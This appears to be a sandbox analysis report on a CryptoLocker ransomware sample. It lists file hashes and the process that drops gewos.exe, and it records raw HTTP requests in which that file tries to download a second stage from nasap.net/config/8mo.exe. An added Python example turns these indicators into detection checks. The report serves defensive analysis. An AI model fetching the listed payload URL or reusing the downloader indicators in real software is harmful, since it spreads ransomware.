Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240221-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/02/2024, 02:27 UTC

General

  • Target

    2024-02-25_2220829d980abd0ac0e2efcc96e03306_cryptolocker.exe

  • Size

    43KB

  • MD5

    2220829d980abd0ac0e2efcc96e03306

  • SHA1

    b7e945f0b4f49d2f71a78d06f3e8bface7acf59e

  • SHA256

    678cb015766ef42bfb1fb94f72dbe5c904aaea1ad99461b92d3447188c202fc8

  • SHA512

    c6d65ece8ccaa0d98746358a26f92602bfb2d550c0770227a5399f5589f9ad2f761105d5a3664f716ee77be1caab4469955a7766cc6e35bdf0180e7d5ec06296

  • SSDEEP

    768:btB9g/WItCSsAGjX7r3BPOMHocM4vUUOmJ+96eg1lL:btB9g/xtCSKfxLIcMzUw96DL

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-02-25_2220829d980abd0ac0e2efcc96e03306_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-02-25_2220829d980abd0ac0e2efcc96e03306_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4592
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:4988

Network

  DNS and HTTP events in the order recorded. Every remote address is flagged US in the report. "-" in the Process column means the report attributes no process to the lookup; that is the case for every PTR query, so those are best read as sandbox/OS background traffic rather than sample behaviour. Only the two nasap.net lookups and the two HTTPS requests are attributed to the dropped gewos.exe.

  Process    Type  Query / request                          Remote            Answer / response
  -          DNS   76.32.126.40.in-addr.arpa IN PTR         8.8.8.8:53        (none)
  -          DNS   240.221.184.93.in-addr.arpa IN PTR       8.8.8.8:53        (none)
  -          DNS   26.35.223.20.in-addr.arpa IN PTR         8.8.8.8:53        (none)
  gewos.exe  DNS   nasap.net IN A                           8.8.8.8:53        nasap.net IN A 35.212.119.5
  gewos.exe  GET   https://nasap.net/config/8mo.exe         35.212.119.5:443  301 Moved Permanently (exchange 1 below)
  -          DNS   5.119.212.35.in-addr.arpa IN PTR         8.8.8.8:53        5.119.212.35.bc.googleusercontent.com
  -          DNS   226.20.18.104.in-addr.arpa IN PTR        8.8.8.8:53        (none)
  gewos.exe  DNS   www.nasap.net IN A                       8.8.8.8:53        www.nasap.net IN CNAME nasap.net; nasap.net IN A 35.212.119.5
  gewos.exe  GET   https://www.nasap.net/config/8mo.exe     35.212.119.5:443  404 Not Found (exchange 2 below)
  -          DNS   26.165.165.52.in-addr.arpa IN PTR        8.8.8.8:53        (none)
  -          DNS   171.39.242.20.in-addr.arpa IN PTR        8.8.8.8:53        (none)
  -          DNS   217.135.221.88.in-addr.arpa IN PTR       8.8.8.8:53        a88-221-135-217.deploy.static.akamaitechnologies.com
  -          DNS   194.178.17.96.in-addr.arpa IN PTR        8.8.8.8:53        a96-17-178-194.deploy.static.akamaitechnologies.com
  -          DNS   48.229.111.52.in-addr.arpa IN PTR        8.8.8.8:53        (none)
  -          DNS   8.179.89.13.in-addr.arpa IN PTR          8.8.8.8:53        (none)

  The download attempt fails in this run: the bare-domain request is redirected by WordPress (X-Redirect-By) to www.nasap.net, and the follow-up request there returns 404, so no second-stage payload (8mo.exe) was retrieved. The fixed User-Agent "Updates downloader" and the /config/8mo.exe path are the usable network indicators.

  HTTP exchange 1: gewos.exe to 35.212.119.5:443

    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache

    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Sun, 25 Feb 2024 02:27:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    X-Redirect-By: WordPress
    Location: https://www.nasap.net/config/8mo.exe
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W301 NC:000000 UP:

  HTTP exchange 2: gewos.exe to 35.212.119.5:443

    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Cache-Control: no-cache
    Host: www.nasap.net
    Connection: Keep-Alive

    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 25 Feb 2024 02:27:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W NC:000000 UP:
  Connection summary. Byte and packet counts are listed in the report's order: sent, received, packets sent, packets received (the DNS rows bear this out: 71 B is the size of the outgoing PTR query packet, 157 B the reply). "-" means no process attributed or no result listed.

  Remote            Query / URL                            Proto      Process    Sent    Received  Pkts sent  Pkts recv  Result
  35.212.119.5:443  https://nasap.net/config/8mo.exe       tls, http  gewos.exe  1.1kB   5.7kB     13         10         GET, HTTP 301
  35.212.119.5:443  https://www.nasap.net/config/8mo.exe   tls, http  gewos.exe  3.6kB   81.1kB    67         64         GET, HTTP 404
  8.8.8.8:53        76.32.126.40.in-addr.arpa              dns        -          71 B    157 B     1          1          -
  8.8.8.8:53        240.221.184.93.in-addr.arpa            dns        -          73 B    144 B     1          1          -
  8.8.8.8:53        26.35.223.20.in-addr.arpa              dns        -          71 B    157 B     1          1          -
  8.8.8.8:53        nasap.net                              dns        gewos.exe  55 B    71 B      1          1          35.212.119.5
  8.8.8.8:53        5.119.212.35.in-addr.arpa              dns        -          71 B    122 B     1          1          -
  8.8.8.8:53        226.20.18.104.in-addr.arpa             dns        -          72 B    134 B     1          1          -
  8.8.8.8:53        www.nasap.net                          dns        gewos.exe  59 B    89 B      1          1          35.212.119.5
  8.8.8.8:53        26.165.165.52.in-addr.arpa             dns        -          72 B    146 B     1          1          -
  8.8.8.8:53        171.39.242.20.in-addr.arpa             dns        -          72 B    158 B     1          1          -
  8.8.8.8:53        217.135.221.88.in-addr.arpa            dns        -          73 B    139 B     1          1          -
  8.8.8.8:53        194.178.17.96.in-addr.arpa             dns        -          72 B    137 B     1          1          -
  8.8.8.8:53        48.229.111.52.in-addr.arpa             dns        -          72 B    158 B     1          1          -
  8.8.8.8:53        8.179.89.13.in-addr.arpa               dns        -          70 B    144 B     1          1          -

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe

    Filesize

    43KB

    MD5

    bd5c09f7c2dc540c17b343483cc483f4

    SHA1

    07d8d9da799d0bbb903db9f05f47ae31968a49af

    SHA256

    20a3d29a322bb13daf9e908a91ed1e932b3c9e36e828a71e3b34a6b02e6d2e5e

    SHA512

    17811433959f6132810ea8b4e8f066a5a86ed07d9ecd5c128f25fde7e6f8a21b6a93e65fc6ebf9ee6f8395be68f92c0a7ebbeea3e745653b9447249083eedaf1

  • memory/4592-0-0x0000000002340000-0x0000000002346000-memory.dmp

    Filesize

    24KB

  • memory/4592-1-0x0000000002340000-0x0000000002346000-memory.dmp

    Filesize

    24KB

  • memory/4592-2-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

  • memory/4988-20-0x0000000002250000-0x0000000002256000-memory.dmp

    Filesize

    24KB
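
Added example, not part of the Triage report and not code from the sample: the report's observables collected into an IOC set, with the two checks a responder would run over their own telemetry. The hash, host, path and User-Agent values are transcribed from the report above; the proxy log lines and their tab-separated field layout are constructed for the example, as are the function names. One point the code makes that the raw list hides: decoding the unattributed PTR queries shows that one of them (5.119.212.35.in-addr.arpa) resolves back to the download host 35.212.119.5.

```python
"""Added example (not from the Triage report): the report's observables as an
IOC set, plus detection logic over constructed proxy and DNS data.
IOC values are transcribed from the report; log lines and layout are assumptions."""
import ipaddress
import re
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# Transcribed from the report: submitted sample, dropped file, download host, UA.
IOCS: Dict[str, Set[str]] = {
    "sha256": {
        "678cb015766ef42bfb1fb94f72dbe5c904aaea1ad99461b92d3447188c202fc8",  # submitted .exe
        "20a3d29a322bb13daf9e908a91ed1e932b3c9e36e828a71e3b34a6b02e6d2e5e",  # dropped gewos.exe
    },
    "hosts": {"nasap.net", "www.nasap.net", "35.212.119.5"},
    "paths": {"/config/8mo.exe"},
    "user_agents": {"Updates downloader"},
}

# DNS events as the report lists them: (name, qtype, attributed process or None).
DNS_EVENTS: List[Tuple[str, str, Optional[str]]] = [
    ("76.32.126.40.in-addr.arpa", "PTR", None),
    ("240.221.184.93.in-addr.arpa", "PTR", None),
    ("26.35.223.20.in-addr.arpa", "PTR", None),
    ("nasap.net", "A", "gewos.exe"),
    ("5.119.212.35.in-addr.arpa", "PTR", None),
    ("226.20.18.104.in-addr.arpa", "PTR", None),
    ("www.nasap.net", "A", "gewos.exe"),
    ("26.165.165.52.in-addr.arpa", "PTR", None),
    ("171.39.242.20.in-addr.arpa", "PTR", None),
    ("217.135.221.88.in-addr.arpa", "PTR", None),
    ("194.178.17.96.in-addr.arpa", "PTR", None),
    ("48.229.111.52.in-addr.arpa", "PTR", None),
    ("8.179.89.13.in-addr.arpa", "PTR", None),
]

# Constructed proxy log lines (tab-separated: time, client, method, url, status, user-agent).
# NOT from the report; they imitate what a web proxy would have logged for this traffic.
PROXY_LOG = [
    "2024-02-25T02:27:21Z\t10.0.0.5\tGET\thttps://nasap.net/config/8mo.exe\t301\tUpdates downloader",
    "2024-02-25T02:27:22Z\t10.0.0.5\tGET\thttps://www.nasap.net/config/8mo.exe\t404\tUpdates downloader",
    "2024-02-25T02:28:00Z\t10.0.0.7\tGET\thttps://www.example.com/\t200\tMozilla/5.0",
    "2024-02-25T02:29:00Z\t10.0.0.9\tGET\thttp://203.0.113.10/config/8mo.exe\t200\tMozilla/5.0",
]

_PTR_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa\.?$", re.I)


def ptr_name_to_ip(name: str) -> Optional[str]:
    """Turn a reverse-lookup name (76.32.126.40.in-addr.arpa) back into the
    address being resolved (40.126.32.76); None if it is not an IPv4 PTR name."""
    m = _PTR_RE.match(name)
    if not m:
        return None
    ip = ".".join(reversed(m.groups()))
    try:
        ipaddress.IPv4Address(ip)  # rejects octets above 255
    except ValueError:
        return None
    return ip


def scan_proxy_line(line: str) -> List[str]:
    """Reasons a proxy log line matches the report's network indicators
    (empty list = clean). Host and path are matched separately so the same
    payload path served from a different host still trips the path rule."""
    _ts, _client, _method, url, _status, ua = line.rstrip("\n").split("\t")
    parts = urlsplit(url)
    reasons = []
    if ua in IOCS["user_agents"]:
        reasons.append(f"user-agent {ua!r}")
    if parts.hostname in IOCS["hosts"]:
        reasons.append(f"host {parts.hostname}")
    if parts.path in IOCS["paths"]:
        reasons.append(f"path {parts.path}")
    return reasons


def triage_dns(events):
    """Split DNS events into lookups attributed to the sample and unattributed
    reverse lookups, the latter returned as the addresses they resolve."""
    attributed, reverse_ips = [], []
    for name, qtype, proc in events:
        if proc is not None:
            attributed.append((proc, qtype, name))
        elif qtype == "PTR":
            ip = ptr_name_to_ip(name)
            if ip:
                reverse_ips.append(ip)
    return attributed, reverse_ips


def reverse_lookups_of_iocs(events) -> List[str]:
    """Unattributed PTR lookups whose target is one of the report's hosts;
    the PTR list reads as background noise until it is decoded this way."""
    _, reverse_ips = triage_dns(events)
    return sorted(ip for ip in reverse_ips if ip in IOCS["hosts"])


if __name__ == "__main__":
    for entry in PROXY_LOG:
        print(entry.split("\t")[3], "->", scan_proxy_line(entry) or "clean")
    print("PTR lookups of report hosts:", reverse_lookups_of_iocs(DNS_EVENTS))
```

The fourth constructed log line shows why host and path are matched independently: a copy of the payload hosted elsewhere under the same /config/8mo.exe path still produces a hit, while a legitimate request to an unrelated site with a browser User-Agent produces none.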
